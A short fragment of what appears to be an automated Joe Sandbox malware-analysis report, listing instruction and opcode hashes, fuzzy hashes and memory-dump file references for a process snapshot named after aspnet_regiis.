                                                                                                                            • Instruction Fuzzy Hash: 21315371A002149FC718CF5DCCC0A9F77B5FF84354B548539FA4A8BB08E671E9648B94
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1294909896-0
                                                                                                                            • Opcode ID: e211fa768c3878941b5a250a413acd842b0d94cd5e72de437bafa98071597ee6
                                                                                                                            • Instruction ID: 3d2c76223ff4c2395d248baa454785bc35ab1e07ec6f7885cd3a42e98f5237bb
                                                                                                                            • Opcode Fuzzy Hash: e211fa768c3878941b5a250a413acd842b0d94cd5e72de437bafa98071597ee6
                                                                                                                            • Instruction Fuzzy Hash: DEF0F9B27012049BE7209A58E888D4BB3ADEF41358B504036EA16C3B01F332F919C6B1